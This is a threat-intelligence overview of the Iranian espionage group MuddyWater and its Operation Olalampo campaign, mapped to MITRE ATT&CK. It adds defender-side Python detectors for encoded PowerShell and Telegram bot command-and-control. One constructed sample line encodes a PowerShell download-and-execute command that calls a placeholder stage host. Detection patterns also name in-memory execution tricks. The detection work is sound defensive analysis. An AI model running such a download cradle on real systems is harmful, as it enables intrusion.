Who is MuddyWater?
A Technical Overview of the Iranian APT and the Context of Operation Olalampo
MuddyWater is a cyber-espionage group widely believed to operate on behalf of Iran’s intelligence apparatus. Security researchers and government agencies assess that the group is linked to the Iranian Ministry of Intelligence and Security (MOIS) and functions as part of the country’s state-sponsored cyber operations. The group has been active since at least 2017 and has conducted campaigns against government agencies, telecommunications companies, energy providers, defence contractors, and other critical sectors around the world.
Although MuddyWater’s operations originally focused on intelligence collection, the group has gradually expanded its toolkit and objectives. Recent campaigns suggest a shift toward more disruptive and hybrid operations that mix espionage, data theft, and destructive attacks. The 2025–2026 campaign, known as Operation Olalampo, illustrates this evolution. The operation targeted organisations across the Middle East and North Africa and introduced several new malware families and command-and-control techniques.
To understand the significance of Olalampo, it is necessary to examine MuddyWater’s historical development, operational patterns, and technical methods as mapped in the MITRE ATT&CK framework.
Origins and Attribution
Threat intelligence firms first began tracking MuddyWater activity in 2017. Multiple vendors independently discovered similar attack campaigns and later connected them to a single actor cluster. Over time, the group received many different names depending on the organisation reporting it. These include Seedworm, Static Kitten, Mercury, Mango Sandstorm, and TEMP.Zagros.
Despite the naming differences, most researchers now agree that these labels refer to the same threat actor. Evidence for this conclusion includes shared malware families, infrastructure reuse, and overlapping targeting patterns.
Government cybersecurity advisories and industry research link MuddyWater to Iranian intelligence operations. Analysts assess that the group operates under the Ministry of Intelligence and Security and supports the strategic objectives of the Iranian state.
Unlike some cybercriminal groups that focus on financial gain, MuddyWater campaigns usually align with geopolitical priorities. Targets frequently include government ministries, energy companies, telecommunications providers, and organisations connected to regional conflicts.
These characteristics place MuddyWater within the category of advanced persistent threats (APTs). APT groups differ from conventional cybercriminals in several ways. They are usually state-sponsored, operate over long time periods, and prioritize intelligence collection or strategic disruption over immediate financial profit.
Operational Goals and Targeting
MuddyWater campaigns commonly target organisations that provide strategic information or influence geopolitical events. These targets often include national governments, defence contractors, oil and gas companies, telecommunications firms, and infrastructure operators.
Geographically, the group has focused heavily on the Middle East, but it has also targeted victims in Asia, Europe, Africa, and North America.
The objectives of these campaigns typically include:
intelligence collection from government networks
monitoring political opponents or dissidents
gaining access to infrastructure systems
preparing for potential disruptive operations
In many cases, MuddyWater operations appear to serve both espionage and strategic positioning. By gaining long-term access to networks in energy, telecommunications, or government systems, the group can collect intelligence while also maintaining the ability to conduct disruptive attacks later.
MITRE ATT&CK Perspective: Core Tradecraft
The MITRE ATT&CK framework is widely used to map threat actor techniques across the lifecycle of a cyberattack. MuddyWater campaigns follow a consistent attack pattern that fits many of the ATT&CK tactics and techniques.
Initial Access
One of the group’s most common entry methods is spear-phishing. Attackers send carefully crafted emails to targeted individuals with malicious attachments or links. These attachments are often Microsoft Office documents that contain macros or embedded scripts. When the victim opens the document, the script downloads the next stage of the attack.
This behaviour corresponds to the MITRE ATT&CK technique Phishing (T1566) under the Initial Access tactic. In some cases, MuddyWater has also exploited vulnerabilities in public-facing servers. This allows the attackers to gain entry without relying on user interaction.
Execution
After gaining access, MuddyWater often uses scripting environments for code execution. PowerShell is a common tool in their operations. By running scripts directly in memory, attackers can avoid leaving obvious artefacts on disk.
This technique maps to Command and Scripting Interpreter (T1059) in MITRE ATT&CK.
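In-memory execution leaves no script on disk, but the launch itself is still recorded by process-creation logging, and an encoded PowerShell command line can be decoded and scored there. The following is an added defender-side example, not code from this page or from the group's tooling; the pipe-separated record format, host names and the placeholder stage URL are constructed.

```python
import base64
import binascii
import re

# Abbreviations powershell.exe accepts for -EncodedCommand; the argument is base64 of UTF-16LE text.
ENC_FLAG = re.compile(r"(?i)\s-(?:e|ec|en|enc[a-z]*)\s+([A-Za-z0-9+/=]+)")

# Detection patterns for scripts that fetch or unpack code and run it without writing a file.
IN_MEMORY_INDICATORS = {
    "eval": r"\biex\b|invoke-expression",
    "web-fetch": r"downloadstring|downloaddata|invoke-webrequest|\biwr\b",
    "inline-base64": r"frombase64string",
    "reflective-load": r"reflection\.assembly",
}

def decode_encoded_command(cmdline: str):
    """Return the script behind -EncodedCommand, or None if absent or malformed."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    blob = m.group(1)
    blob += "=" * (-len(blob) % 4)  # some log shippers strip base64 padding
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError):
        return None

def triage(record: str) -> dict:
    """Score one constructed 'host|image|cmdline' process-creation record."""
    host, image, cmdline = record.split("|", 2)
    decoded = decode_encoded_command(cmdline)
    text = (decoded if decoded is not None else cmdline).lower()
    hits = sorted(k for k, pat in IN_MEMORY_INDICATORS.items() if re.search(pat, text))
    hidden = re.search(r"(?i)-w(?:indowstyle)?\s+hidden", cmdline) is not None
    # In-memory indicators alone occur in admin scripts; require encoding or a hidden window too.
    return {"host": host, "image": image, "decoded": decoded, "indicators": hits,
            "hidden_window": hidden, "suspicious": bool(hits) and (decoded is not None or hidden)}

def _b64_utf16(script: str) -> str:
    return base64.b64encode(script.encode("utf-16le")).decode()

# Constructed sample records (not real telemetry); the stage URL is a placeholder.
SAMPLE_RECORDS = [
    "WS-01|powershell.exe|powershell.exe -NoProfile -Command Get-Service -Name Spooler",
    "WS-17|powershell.exe|powershell.exe -NoP -W Hidden -Enc "
    + _b64_utf16("IEX (New-Object Net.WebClient).DownloadString('http://stage.example.invalid/s2')"),
    "WS-22|powershell.exe|powershell.exe -EncodedCommand " + _b64_utf16("Get-Date"),
]
```

Running `triage` over each record flags only the hidden-window, encoded launch whose decoded body fetches and evaluates remote content; the plain admin command and the harmless encoded one pass.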
Persistence
Maintaining access is a key part of APT operations. MuddyWater often installs remote management tools or custom backdoors that allow them to reconnect later.
Researchers have observed the group using legitimate remote administration tools to maintain persistence within compromised networks. Because these tools are normally used by system administrators, they can blend into normal network activity.
Defense Evasion
Defence evasion is another hallmark of MuddyWater activity. The group frequently obfuscates scripts and disguises malicious components as legitimate software. Examples include loaders that impersonate legitimate system files or hide malicious code inside trusted processes.
This behaviour corresponds to techniques such as Obfuscated Files or Information (T1027) and Masquerading (T1036).
Command and Control
Once a system is compromised, MuddyWater establishes command-and-control channels to communicate with the infected machine. These channels allow attackers to issue commands, upload tools, or exfiltrate data.
Historically, the group used standard web protocols or custom malware backdoors for command-and-control communication. More recent campaigns have experimented with alternative channels, including messaging platforms.
Malware and Tooling
Over the years, MuddyWater has used a wide range of malware families and tools. Some of these are custom-built, while others are legitimate tools repurposed for malicious activity. One early example is POWERSTATS, a PowerShell-based backdoor used as an initial stage implant in compromised systems.
The group has also deployed loaders and backdoors such as PowGoop and Mori. These components allow attackers to download additional payloads and maintain remote control over infected machines.
A notable feature of MuddyWater operations is the frequent use of “living-off-the-land” techniques. In this approach, attackers rely on built-in system tools rather than installing large amounts of malware. This reduces the forensic footprint of the attack and helps evade security monitoring systems.
In addition to custom malware, the group sometimes installs legitimate remote management tools to control victim systems. Because these tools are widely used by IT teams, their presence may not immediately trigger suspicion.
Evolution of MuddyWater Campaigns
The development of MuddyWater activity over the past decade shows a pattern of gradual capability expansion.
Early campaigns mainly focused on espionage operations targeting regional governments and telecommunications companies. These operations typically relied on spear-phishing and simple PowerShell scripts. Over time, the group began using more complex malware frameworks and multi-stage attack chains. Researchers have also observed the group experimenting with different command-and-control architectures and malware delivery mechanisms.
Another key feature of MuddyWater campaigns is infrastructure reuse. Domains and servers used in previous operations often reappear in later campaigns. This pattern has helped analysts attribute attacks to the same group even when the malware changes. The evolution of the group’s tactics suggests a maturing organisation that learns from previous operations and adapts to defensive improvements.
Operation Olalampo
Operation Olalampo represents one of the most recent and significant campaigns attributed to MuddyWater. The campaign targeted organisations across the Middle East and North Africa and began to appear in threat intelligence reporting in early 2026.
The operation followed many elements of the group’s historical playbook but also introduced new malware and infrastructure. The attack chain typically began with spear-phishing emails that contained malicious Microsoft Office documents. When the document was opened, embedded macros executed scripts that downloaded the next stage of malware.
These scripts installed downloader components that retrieved additional tools from command-and-control servers. Researchers identified several new malware families in the campaign. These included loaders and backdoors designed to provide persistent remote access to infected systems.
One of the most unusual aspects of Olalampo was the use of messaging infrastructure as part of the command-and-control system. In at least one case, a backdoor communicated with operators through a Telegram bot.
This approach can make detection more difficult because the traffic blends with legitimate communication on widely used platforms.
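Blending into a popular platform does not make the channel invisible in web proxy logs: the Telegram Bot API path (https://api.telegram.org/bot<id>:<secret>/<method>) is not something interactive Telegram clients use, and an implant polling it tends to do so on a fixed cadence. The example below is added here and is not code from the page or the campaign; the log format, host names and bot token are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Bot API calls look like https://api.telegram.org/bot<id>:<secret>/<method>. Interactive clients
# use MTProto instead. Only the numeric bot id is reported; the secret never reaches the output.
BOT_API = re.compile(r"https?://api\.telegram\.org/bot(\d+):([A-Za-z0-9_-]+)/(\w+)")

# Constructed proxy log (not real traffic): "<iso8601> <src_host> <http_method> <url>".
SAMPLE_PROXY_LOG = """\
2026-02-03T08:00:00Z WS-17 GET https://api.telegram.org/bot123456789:AAExampleSecretTokenValue/getUpdates
2026-02-03T08:00:30Z WS-17 GET https://api.telegram.org/bot123456789:AAExampleSecretTokenValue/getUpdates
2026-02-03T08:01:00Z WS-17 POST https://api.telegram.org/bot123456789:AAExampleSecretTokenValue/sendDocument
2026-02-03T08:01:30Z WS-17 GET https://api.telegram.org/bot123456789:AAExampleSecretTokenValue/getUpdates
2026-02-03T08:00:05Z WS-04 GET https://web.telegram.org/a/
"""

def parse_bot_api_requests(log_text: str):
    """Yield (timestamp, host, bot_id, api_method) for lines that hit the Bot API; skip all others."""
    for line in log_text.splitlines():
        ts, host, _http_method, url = line.split(" ", 3)
        m = BOT_API.match(url)
        if m:
            yield datetime.fromisoformat(ts.replace("Z", "+00:00")), host, m.group(1), m.group(3)

def profile_hosts(log_text: str, min_requests: int = 3, max_jitter: float = 0.2) -> dict:
    """Per source host: bot ids, API methods, polling cadence and verdicts.
    beaconing: >= min_requests calls whose inter-request gaps vary by at most max_jitter (CV).
    uploads: send* methods, i.e. data leaving the host through the bot rather than commands arriving."""
    by_host = defaultdict(list)
    for rec in parse_bot_api_requests(log_text):
        by_host[rec[1]].append(rec)
    report = {}
    for host, recs in by_host.items():
        recs.sort(key=lambda r: r[0])
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(recs, recs[1:])]
        cv = pstdev(gaps) / mean(gaps) if len(gaps) >= 2 and mean(gaps) > 0 else None
        methods = sorted({r[3] for r in recs})
        report[host] = {
            "bot_ids": sorted({r[2] for r in recs}),
            "api_methods": methods,
            "mean_gap_s": round(mean(gaps), 1) if gaps else None,
            "jitter_cv": round(cv, 3) if cv is not None else None,
            "beaconing": cv is not None and len(recs) >= min_requests and cv <= max_jitter,
            "uploads": [m for m in methods if m.startswith("send")],
        }
    return report
```

On the sample, WS-04's browser session to web.telegram.org is ignored, while WS-17 is reported for metronomic getUpdates polling plus a sendDocument upload.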
Another notable development in the campaign was the apparent use of artificial intelligence-assisted code generation. Researchers analysing the malware observed characteristics that suggested automated or AI-assisted development.
If accurate, this may indicate a broader shift in how threat actors develop malware.
Strategic Context of the Olalampo Campaign
The timing and targets of Operation Olalampo suggest a connection to regional geopolitical tensions. The campaign targeted organisations in the Middle East and Africa, aligning with areas where Iranian strategic interests are strong. Cybersecurity researchers have noted that Iranian cyber operations often increase during periods of political conflict or military tension. In these cases, cyber operations can serve as both intelligence gathering and indirect retaliation.
Recent analysis of Iranian cyber activity suggests that some campaigns are becoming more aggressive, including attacks designed to disrupt infrastructure or destroy data. While MuddyWater has historically focused on espionage, its newer campaigns may reflect a broader shift toward hybrid cyber operations that combine intelligence collection with disruption.
Techniques Observed in Olalampo
From a MITRE ATT&CK perspective, the Olalampo campaign demonstrates many of the techniques that have defined MuddyWater operations.
The campaign used spear-phishing for initial access and PowerShell-based loaders for execution. It also deployed multi-stage malware chains to maintain persistence and control infected systems.
Several techniques observed in the campaign include:
malicious macro execution within Office documents
staged malware downloaders
command-and-control communications through messaging platforms
reuse of previously observed infrastructure
These techniques show continuity with earlier MuddyWater campaigns while also introducing new elements such as expanded malware frameworks and novel communication channels.
Dealing with MuddyWater
The continued activity of MuddyWater illustrates several important trends in modern cyber conflict:
First, state-sponsored cyber groups are increasingly persistent and adaptive. Instead of conducting isolated attacks, groups like MuddyWater operate continuously and refine their techniques over time.
Second, the boundary between espionage and cybercrime is becoming less clear. Some Iranian operations combine intelligence gathering with financially motivated activity or destructive malware.
Finally, the use of legitimate tools and common internet services makes detection more difficult. By blending malicious traffic with normal activity, attackers can remain inside networks for long periods.
MuddyWater is one of the most active Iranian state-linked cyber threat groups. Since at least 2017, it has conducted espionage and intrusion campaigns against governments, infrastructure operators, and private companies around the world. The group’s operations follow a consistent pattern that maps well to the MITRE ATT&CK framework. Spear-phishing, PowerShell execution, living-off-the-land techniques, and persistent command-and-control channels are central elements of its tradecraft.
Operation Olalampo demonstrates how the group continues to evolve. The campaign introduced new malware variants, experimented with alternative command-and-control channels, and showed signs of AI-assisted development. While the core objective of MuddyWater remains intelligence collection, recent campaigns suggest a broader operational scope that includes disruptive and hybrid cyber operations. As geopolitical tensions continue to influence cyber activity, groups like MuddyWater are likely to remain significant actors in the global threat landscape.



The spear-phishing initial access is relevant to our work. Does the group use any particular registrar, TLD, string composition that we might use to delve into our data sets?